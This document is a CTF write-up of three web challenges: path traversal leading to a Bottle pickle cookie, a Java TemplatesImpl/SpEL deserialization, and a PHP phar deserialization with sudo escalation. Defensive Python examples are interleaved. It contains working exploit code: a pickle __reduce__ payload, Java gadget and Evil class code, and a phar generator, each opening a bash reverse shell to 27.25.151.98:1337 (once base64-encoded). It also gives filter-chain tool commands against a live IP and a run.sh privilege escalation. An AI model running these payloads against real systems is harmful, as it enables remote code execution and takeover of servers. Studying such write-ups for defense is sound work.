Recently I've been busy with China Unicom's security admission testing and have had little time for CTF, so tonight I'm taking a bit of time to go back over last week's offline challenges (haven't started reviewing for finals yet 😢)
It feels like half of a penetration test is spent haggling with the client and filing junk findings, with no sense of surprise; CTF is still more fun
Contents
Mountain
ez_zhuawa
Image Info Viewer
Mountain
Scan for directories
Visiting ./display shows a hint that the parameter is photo; /display?photo=Mountain1.png returns the image
Arbitrary file read?
Environment variables can't be read directly?
Capture the request and look at the response headers: it's a Python challenge?
In that case the usual move is to read the currently running source file
/display?photo=/proc/1/cmdline
/display?photo=/appppp/app.py
from bottle import Bottle, route, run, template, request, response
from config.D0g3_GC import Mountain
import os
import re

messages = []


@route("/")
def home():
    return template("index")


@route("/hello")
def hello_world():
    try:
        session = request.get_cookie("name", secret=Mountain)
        if not session or session["name"] == "guest":
            session = {"name": "guest"}
            response.set_cookie("name", session, secret=Mountain)
        return template("guest", name=session["name"]) if session["name"] == "admin" else None
    except:
        return "hacker!!! I've caught you"


@route("/display")
def get_image():
    photo = request.query.get('photo')
    if photo is None:
        return template('display')
    if re.search("^../|environ|self", photo):
        return "Hacker!!! I'll catch you no matter what you do!!!"
    requested_path = os.path.join(os.getcwd(), "picture", photo)
    try:
        if photo.endswith('.png'):
            default_png_path = "/appppp/picture/"
            pngrequested_path = default_png_path + photo
            with open(pngrequested_path, 'rb') as f:
                tfile = f.read()
            response.content_type = 'image/png'
        else:
            with open(requested_path) as f:
                tfile = f.read()
    except Exception as e:
        return "you have some errors, continue to try again"
    return tfile


@route("/admin")
def admin():
    session = request.get_cookie("name", secret=Mountain)
    if session and session["name"] == "admin":
        return template("administator", messages=messages)
    else:
        return "No permission!!!!"


if __name__ == "__main__":
    os.chdir(os.path.dirname(__file__))
    run(host="0.0.0.0", port=8089)
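To make the /display flaw concrete from the defender's side, here is an added Python example (not part of the original write-up or the challenge code) that reproduces the check from app.py above, shows which inputs it lets through, and places a hardened resolver next to it. The base directory /appppp and the sample photo names are assumptions of this example.

```python
import os
import re
from typing import Optional

# The challenge's own denylist, reproduced from app.py for comparison.
# Note the unescaped dots: "^../" means "any two characters followed by a slash",
# so it neither reliably blocks traversal nor says anything about absolute paths.
CHALLENGE_DENY = re.compile(r"^../|environ|self")


def challenge_allows(photo: str) -> bool:
    """Result of the original regex gate."""
    return CHALLENGE_DENY.search(photo) is None


def challenge_path(photo: str, base: str = "/appppp") -> str:
    """What the original get_image() ends up opening for a non-.png request.

    os.path.join discards every earlier component as soon as it meets an absolute
    path, so photo="/proc/1/cmdline" becomes "/proc/1/cmdline", not a file under picture/.
    """
    return os.path.join(base, "picture", photo)


def safe_photo_path(photo: str, base: str) -> Optional[str]:
    """Hardened resolver: returns a path only if it stays inside <base>/picture.

    The decision is made on the resolved path, not on the input string, so every
    spelling of traversal ("./../", "a/../../", symlinks) is handled the same way.
    """
    if os.path.isabs(photo) or "\x00" in photo:
        return None
    picture_dir = os.path.realpath(os.path.join(base, "picture"))
    candidate = os.path.realpath(os.path.join(picture_dir, photo))
    try:
        if os.path.commonpath([picture_dir, candidate]) != picture_dir:
            return None
    except ValueError:
        return None
    return candidate
```

The denylist explains the write-up's observation that /proc/1/environ could not be read (the literal "environ" is blocked) while /proc/1/cmdline and /appppp/app.py could: absolute paths are never examined, and the join silently drops the intended prefix.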
Next, visit ./hello
It sets a Cookie, and the part after the ? looks a lot like pickle-serialized data
Auditing the code confirms the cookie goes through pickle deserialization
First visit /display?photo=/appppp/config/D0g3_GC.py to get the secret key
The easiest way to obtain a malicious cookie is to run your own server
from bottle import Bottle, route, run, template, request, response
import os

# Secret key read from /appppp/config/D0g3_GC.py on the target
Mountain = "M0UNTA1ND0G3GCYYDSP0EM5S20I314Y0UARE50SMAR7"


class Test:
    def __reduce__(self):
        return (eval, ("""__import__('os').system('bash -c "bash -i >& /dev/tcp/27.25.151.98/1337 0>&1"')""",))


@route("/hello")
def hello_world():
    try:
        session = {"name": Test()}
        response.set_cookie("name", session, secret=Mountain)
        return "ok"
    except:
        return "hacker!!! I've caught you"


if __name__ == "__main__":
    os.chdir(os.path.dirname(__file__))
    run(host="0.0.0.0", port=8089)
Then visit it to get the malicious cookie
Replace the cookie and visit ./admin on the target; the reverse shell comes back and the flag is read
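The cookie problem in Mountain comes from the server unpickling whatever the signed cookie carries, so anyone holding the secret controls code execution. As an added defensive example (not code from the write-up or the challenge), the snippet below shows the shape of a session cookie that cannot be turned into code execution: a JSON payload, an HMAC-SHA256 signature, constant-time comparison, and a schema check on the decoded value. The secret and the "<sig>.<payload>" layout are assumptions of this example.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed placeholder secret for this example; a real deployment loads it from config.
SECRET = b"example-secret-rotate-me"


def sign(payload: bytes, secret: bytes) -> str:
    """HMAC-SHA256 over the encoded payload, returned as URL-safe base64."""
    return base64.urlsafe_b64encode(hmac.new(secret, payload, hashlib.sha256).digest()).decode()


def encode_cookie(session: object, secret: bytes) -> str:
    """Serialize with JSON (plain data, no object reconstruction) and sign: '<sig>.<payload>'."""
    payload = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode())
    return sign(payload, secret) + "." + payload.decode()


def decode_cookie(value: str, secret: bytes) -> Optional[dict]:
    """Return the session dict only if the signature verifies and the shape is what we expect."""
    try:
        sig_b64, payload = value.split(".", 1)
        expected = sign(payload.encode(), secret)
        # Constant-time comparison so the check does not leak timing information.
        if not hmac.compare_digest(sig_b64, expected):
            return None
        data = json.loads(base64.urlsafe_b64decode(payload))
    except (ValueError, TypeError):
        return None
    # Schema check: pickle would hand back whatever object the cookie described;
    # here anything other than {"name": <str>} is rejected before the app looks at it.
    if not isinstance(data, dict) or not isinstance(data.get("name"), str):
        return None
    return data


def role_from_cookie(value: str, secret: bytes) -> str:
    """What an /admin check should key on: a verified name, defaulting to guest."""
    session = decode_cookie(value, secret)
    return session["name"] if session else "guest"
```

Even with the secret leaked through the file read, the worst a forged cookie can do here is claim a different name; it can never cause the server to construct an object or call a function during decoding.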
ez_zhuawa
At the challenge entry point, data is deserialized first, then SpEL parses and evaluates the param expression; the expression can pull values out of the deserialized object (i.e., call its getter methods)
As is well known, the TemplatesImpl chain is as follows, so it is enough to instantiate a TemplatesImpl and call its getOutputProperties method
TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()
The challenge bans a whole list of things, just not TemplatesImpl
Exp.java
package org.example.GCCTF.exp;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;

import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;

public class Exp {
    public static void main(String[] args) throws Exception {
        byte[] code = ClassPool.getDefault().get(Evil.class.getName()).toBytecode();
        byte[][] codes = {code};
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "aaa");
        setFieldValue(templates, "_class", null);
        setFieldValue(templates, "_bytecodes", codes);
        byte[] result = serialize(templates);
        System.out.println(Base64.getEncoder().encodeToString(result));
    }

    public static byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(object);
        return byteArrayOutputStream.toByteArray();
    }

    public static void setFieldValue(Object obj, String field, Object val) throws Exception {
        Field dField = obj.getClass().getDeclaredField(field);
        dField.setAccessible(true);
        dField.set(obj, val);
    }
}
Evil.java
package org.example.GCCTF.exp;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Evil extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    static {
        try {
            Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yNy4yNS4xNTEuOTgvMTMzNyAwPiYx}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}
Finally, pass OutputProperties as param, which calls getOutputProperties on the deserialized object
The flag is read from the environment variables
Image Info Viewer
The hint mentions hI3t.php
Inside there is a file upload feature and a file info query feature: phar deserialization at a glance
Upload an image, then read its file info
It's not hard to guess that getimagesize is called (even if you don't guess it, any file-handling function is a candidate for a filter chain leak)
PHP filter chains: oracle-based file read attack - Xianzhi Community
Use a filter chain to read the file
With the tool below
https://github.com/synacktiv/php_filter_chains_oracle_exploit
python filters_chain_oracle_exploit.py --target http://125.70.243.22:31269/chal13nge.php --file '/var/www/html/hI3t.php' --parameter image_path
Visiting ./x@1.php reveals a backdoor class
Generate a malicious phar archive
<?php
class backdoor
{
    public $cmd;
    function __destruct()
    {
        $cmd = $this->cmd;
        system($cmd);
    }
}

$a = new backdoor();
$a->cmd = 'bash -c "bash -i >& /dev/tcp/27.25.151.98/1337 0>&1"';
$phar = new Phar("gcb.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
Rename the generated gcb.phar to gcb.png, upload it, then read it as
phar://uploads/gcb.png
The shell comes back
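The image viewer is exploitable because a renamed phar is accepted as an image and the file function later receives a path that starts with a stream wrapper. The Python below is an added example (not from the write-up or the challenge, whose code is PHP) of the two server-side checks that would stop this: inspect the uploaded bytes for phar structure, and never hand a wrapper-prefixed or non-filename value to a file function. The sample byte strings and the uploads directory are constructed for the example.

```python
import re
from typing import Optional

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PHAR_STUB_MARK = b"__HALT_COMPILER"   # every phar stub must contain this token
PHAR_TRAILER = b"GBMB"                # the four bytes that close a phar's signature block

# Matches any PHP stream wrapper prefix (phar://, php://, data://, ...), not only phar.
WRAPPER_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*://")
# A bare image filename: no separators, no wrapper, fixed extension set.
FILENAME_RE = re.compile(r"[A-Za-z0-9_\-]+\.(png|jpe?g|gif)")

# Constructed samples: a minimal PNG prefix and a fake layout that only mimics the
# stub/trailer structure of a phar (it is not a working archive).
SAMPLE_PNG = PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
SAMPLE_PHAR = b"<?php __HALT_COMPILER(); ?>\r\n" + b"\x00" * 32 + b"GBMB"
SAMPLE_POLYGLOT = PNG_MAGIC + SAMPLE_PHAR   # PNG-looking header, phar structure behind it


def has_phar_structure(data: bytes) -> bool:
    """True when the bytes carry phar markers, regardless of extension or leading magic."""
    return PHAR_STUB_MARK in data or data.endswith(PHAR_TRAILER)


def accept_image_upload(data: bytes) -> bool:
    """Content-based upload gate: must start like a PNG and must not contain phar structure."""
    return data.startswith(PNG_MAGIC) and not has_phar_structure(data)


def safe_image_path(user_value: str, upload_dir: str = "uploads") -> Optional[str]:
    """Resolve an image_path-style parameter to a file under upload_dir, or None.

    Wrapper prefixes, directory separators and anything but a plain image filename are
    refused, so getimagesize() (or any other file function) can never be pointed at
    phar:// or php:// streams.
    """
    if WRAPPER_RE.match(user_value) or "\x00" in user_value:
        return None
    if not FILENAME_RE.fullmatch(user_value):
        return None
    return f"{upload_dir}/{user_value}"
```

Checking the extension alone is what lets gcb.png through; checking the bytes catches the renamed archive and the polyglot variant alike, and the path allowlist removes the phar:// trigger even if a bad file does land on disk.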
Privileges are insufficient, so escalation is needed
There is sudo permission for /tmp/rootscripts/check.sh
Looking at /tmp/rootscripts/check.sh, it executes a run.sh script from an arbitrary location
Write the malicious sh file
echo "cat /root/flag" > /tmp/run.sh
chmod 777 /tmp/run.sh
Then run it with sudo to get the flag
sudo /tmp/rootscripts/check.sh "/tmp"